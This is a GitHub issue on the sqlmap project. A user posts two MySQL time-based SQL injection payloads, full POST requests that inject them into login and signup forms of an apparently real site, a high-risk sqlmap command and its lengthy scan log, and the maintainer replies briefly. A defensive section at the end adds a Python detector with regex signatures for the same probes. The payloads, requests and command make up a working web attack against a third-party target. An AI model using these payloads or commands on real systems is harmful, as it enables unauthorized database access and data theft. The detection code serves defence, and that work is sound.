sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

How to use these payloads #1633

Closed ghost closed 8 years ago

ghost commented 8 years ago

1) if(now()=sysdate(),sleep(0),0)/'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/

2) (select(0)from(select(sleep(0)))v)/'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/

Requests:

1)
POST /lost.php HTTP/1.1
Content-Length: 150
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.site.ru/
Cookie: PHPSESSID=db5t7hrvhl32iu6e5ur9v6pdd2; defltlang=1
Host: www.site.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

email=if(now()%3dsysdate()%2csleep(0)%2c0)/'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22/&form=sent

2)
POST /signup.php HTTP/1.1
Content-Length: 402
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.site.ru/
Cookie: PHPSESSID=db5t7hrvhl32iu6e5ur9v6pdd2; defltlang=1
Host: www.site.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

allow_emails=yes&canpay=1&confirmcode=g00dPa%24%24w0rD&email1=(select(0)from(select(sleep(0)))v)/'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22_/&email2=sample%40email.tst&form=sent&lang=English&name=anmkklor&passb=g00dPa%24%24w0rD&passwd=g00dPa%24%24w0rD&pay_to=3&receive_paidmail=0&send_weekly_stat=no&sitename=anmkklor&site_lang=1&termscheck=1&url=http://

Log SQLMAP: sqlmap.py -r af.txt -p email1 --random-agent --dbms=mysql --level 5 --risk 3

[sqlmap ASCII banner] {1.0-dev-nongit-20151211} http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 18:52:38

[18:52:38] [INFO] parsing HTTP request from 'af.txt'
[18:52:38] [INFO] fetched random HTTP User-Agent header from file 'C:\sqlmap\txt\user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0'
[18:52:38] [WARNING] provided value for parameter 'email1' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[18:52:38] [INFO] testing connection to the target URL
[18:52:38] [INFO] heuristics detected web page charset 'windows-1251'
[18:52:39] [INFO] testing if the target URL is stable. This can take a couple of seconds
[18:52:40] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[18:52:42] [WARNING] heuristic (basic) test shows that POST parameter 'email1' might not be injectable
[18:52:43] [INFO] heuristic (XSS) test shows that POST parameter 'email1' might be vulnerable to XSS attacks
[18:52:43] [INFO] testing for SQL injection on POST parameter 'email1'
[18:52:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:52:43] [WARNING] reflective value(s) found and filtering out
[18:53:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[18:54:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[18:55:23] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
[18:56:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:57:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:58:27] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:59:07] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[19:00:21] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[19:01:03] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[19:02:08] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[19:02:11] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[19:02:53] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool_int)'
[19:03:47] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool_int)'
[19:04:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:04:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[19:04:45] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace'
[19:04:46] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[19:04:46] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[19:04:47] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[19:04:49] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[19:04:49] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[19:04:55] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool_int)'
[19:04:56] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool_int - original value)'
[19:04:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[19:04:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[19:04:59] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[19:05:00] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[19:05:01] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[19:05:55] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[19:07:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:07:23] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:07:42] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[19:08:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[19:08:25] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[19:08:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[19:09:42] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[19:09:45] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:10:03] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
[19:10:24] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:10:46] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[19:11:30] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[19:12:08] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[19:12:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:12:39] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[19:12:39] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[19:12:39] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[19:12:39] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'
[19:12:45] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[19:12:54] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[19:12:54] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[19:12:55] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'
[19:12:56] [INFO] testing 'MySQL inline queries'
[19:12:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:13:23] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[19:14:01] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[19:14:36] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:15:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[19:15:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:16:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:17:05] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
[19:17:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)'
[19:18:44] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment)'
[19:20:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[19:20:34] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[19:21:43] [INFO] POST parameter 'email1' seems to be 'MySQL >= 5.0.12 OR time-based blind' injectable
[19:21:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:21:43] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:22:03] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[19:22:22] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[19:22:28] [INFO] testing 'Generic UNION query (random number) - 22 to 40 columns'
[19:22:31] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
[19:22:36] [INFO] testing 'Generic UNION query (random number) - 42 to 60 columns'
[19:22:58] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
[19:23:11] [INFO] testing 'Generic UNION query (random number) - 62 to 80 columns'
[19:23:20] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
[19:23:27] [INFO] testing 'Generic UNION query (random number) - 82 to 100 columns'
[19:23:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[19:23:48] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[19:23:54] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[19:24:09] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[19:24:15] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[19:24:21] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
[19:24:31] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[19:24:38] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
[19:24:45] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[19:25:00] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
[19:25:09] [INFO] checking if the injection point on POST parameter 'email1' is a false positive
[19:25:09] [WARNING] false positive or unexploitable injection point detected
[19:25:09] [WARNING] POST parameter 'email1' is not injectable
[19:25:09] [CRITICAL] all tested parameters appear to be not injectable. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[19:25:09] [WARNING] HTTP error codes detected during run: 424 (?) - 2610 times

[*] shutting down at 19:25:09

stamparm commented 8 years ago

Always use only valid parameter values (not SQLi in them)
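From the defending side, the two probe families quoted in this issue (the `if(now()=sysdate(),sleep(N),0)` XOR form and the `(select(0)from(select(sleep(N)))v)` subselect form) are easy to recognise once request bodies are URL-decoded and whitespace-stripped. The detector below is an added example, not code from the issue or from sqlmap; the record shape consumed by `scan_records` is an assumption, and the sample bodies are constructed from the two POST requests above.

```python
import re
from urllib.parse import unquote, unquote_plus

# Signatures for the two MySQL time-based probe families quoted in this issue;
# the sleep() argument is left open so sleep(5) matches as well as sleep(0).
SIGNATURES = {
    "mysql_sleep_xor_probe": re.compile(r"if\(now\(\)=sysdate\(\),sleep\(\d+\),0\)"),
    "mysql_sleep_subselect_probe": re.compile(r"\(select\(0\)from\(select\(sleep\(\d+\)\)\)v\)"),
}

def normalise(raw):
    """Form-decode once (+ becomes a space), percent-decode again to catch
    double encoding, then drop all whitespace and lower-case the result."""
    text = unquote(unquote_plus(raw))
    return re.sub(r"\s+", "", text).lower()

def scan_body(body):
    """Return (field, signature) pairs for every form field carrying a probe."""
    hits = []
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        text = normalise(value)
        for label, pattern in SIGNATURES.items():
            if pattern.search(text):
                hits.append((unquote_plus(name), label))
    return hits

def scan_records(records):
    """records: dicts with 'path', 'status' and 'body' (an assumed shape, e.g.
    what a WAF or reverse proxy exports for POST bodies)."""
    findings = []
    for rec in records:
        for field, label in scan_body(rec["body"]):
            findings.append({"path": rec["path"], "status": rec["status"],
                             "field": field, "signature": label})
    return findings

# Constructed sample: the injected fields from the two POST bodies in the issue,
# a benign sign-up for contrast, and the HTTP 424 status the sqlmap run reported.
SAMPLE_RECORDS = [
    {"path": "/lost.php", "status": 424, "body":
     "email=if(now()%3dsysdate()%2csleep(0)%2c0)/'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'"
     "%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22/&form=sent"},
    {"path": "/signup.php", "status": 424, "body":
     "email1=(select(0)from(select(sleep(0)))v)/'%2b(select(0)from(select(sleep(0)))v)%2b'"
     "%22%2b(select(0)from(select(sleep(0)))v)%2b%22/&email2=sample%40email.tst&form=sent"},
    {"path": "/signup.php", "status": 200,
     "body": "email1=sample%40email.tst&email2=sample%40email.tst&form=sent"},
]
```

Running `scan_records(SAMPLE_RECORDS)` flags the `email` and `email1` fields of the two probe requests and nothing in the benign one; the 2610 HTTP 424 responses the log reports are a second, signature-free signal worth alerting on per client session.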